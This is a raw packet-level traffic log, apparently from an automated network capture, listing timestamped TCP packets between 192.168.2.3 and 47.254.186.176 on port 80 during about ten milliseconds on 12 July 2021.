Jul 12, 2021 10:28:46.478095055 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478118896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478128910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478152990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478177071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478188038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478215933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478228092 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478252888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478277922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478303909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478311062 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478338003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478348970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478569984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478594065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478616953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478626013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478647947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478674889 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478699923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478724003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478749037 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478770971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478816986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478835106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479218006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479276896 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.479304075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479351044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479377985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479398012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.479413033 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479435921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479458094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479468107 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.479489088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479515076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479521036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.479541063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479552984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.479572058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479593039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479619026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479625940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.479648113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479664087 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.479681015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479701996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479723930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.479736090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479759932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479778051 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.479794979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479818106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479844093 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.479942083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.479990005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.480190039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480214119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480263948 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.480273962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480298042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480321884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480348110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480355978 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.480379105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480396986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.480413914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480437994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480460882 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.480470896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480494022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480513096 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.480523109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480545998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480566978 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.480576992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480600119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480619907 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.480633020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480657101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480674028 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.480690002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480712891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.480746031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.481118917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481144905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481182098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481189966 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.481235027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481241941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.481302977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481336117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481352091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.481426954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481453896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481477022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.481504917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481548071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.481625080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481662989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481703043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481714964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.481775045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481802940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481826067 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.481839895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481864929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481884003 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.481898069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481925964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481945038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.481956005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481976986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.481998920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482022047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482036114 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.482058048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482069969 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.482090950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482101917 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.482125044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482146978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482172012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.482181072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482203007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482228041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482234955 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.482259989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482271910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.482294083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482320070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482336998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.482356071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482399940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.482702971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482774019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482798100 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482820988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482835054 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.482861996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482877970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.482917070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.482961893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.483035088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483062029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483083010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483108997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.483187914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483210087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483233929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483242989 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.483285904 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.483310938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483366013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483387947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483414888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.483429909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483474970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.483556032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483639002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483660936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483685017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483695030 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.483716965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483735085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.483747959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483768940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.483793020 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.483946085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484000921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.484066010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484097004 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484122992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484141111 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.484158039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484201908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.484229088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484251022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484296083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.484350920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484378099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484402895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484428883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.484472036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484498024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484519005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.484548092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484574080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484600067 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.484623909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484646082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484667063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484683037 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.484709024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484725952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.484750986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484774113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484801054 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.484826088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.484874010 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.485065937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485126019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485148907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485178947 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.485193014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485263109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.485294104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485316992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485358953 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.485419035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485443115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485464096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485486984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.485625029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485649109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485670090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485681057 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.485723972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.485804081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485902071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.485963106 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.485977888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486000061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486022949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486051083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486057997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.486109018 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.486300945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486402988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486428022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486449957 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.486468077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486510992 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.486573935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486594915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486643076 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.486670017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486692905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486711979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486736059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486742973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.486762047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486783028 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.486790895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486831903 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.486875057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486941099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486960888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.486990929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487015963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487035990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487063885 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487090111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487137079 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487180948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487236977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487260103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487287998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487313986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487359047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487509012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487539053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487581968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487590075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487611055 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487651110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487660885 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487682104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487731934 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487761974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487768888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487798929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487814903 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487833977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487858057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487884045 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487894058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487921953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487943888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.487958908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.487984896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488004923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488019943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488042116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488069057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488075972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488101959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488116026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488140106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488166094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488188982 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488204002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488229036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488254070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488260031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488279104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488296032 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488310099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488332033 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488358974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488364935 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488387108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488400936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488423109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488449097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488471031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488485098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488511086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488528013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488543987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488568068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488586903 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488603115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488626957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488656044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488662958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488687992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488703966 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488720894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488742113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488764048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488771915 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488795996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488816023 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488828897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488851070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488871098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488881111 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488908052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488919973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.488940954 CEST	80	49720	47.254.186.176	192.168.2.3
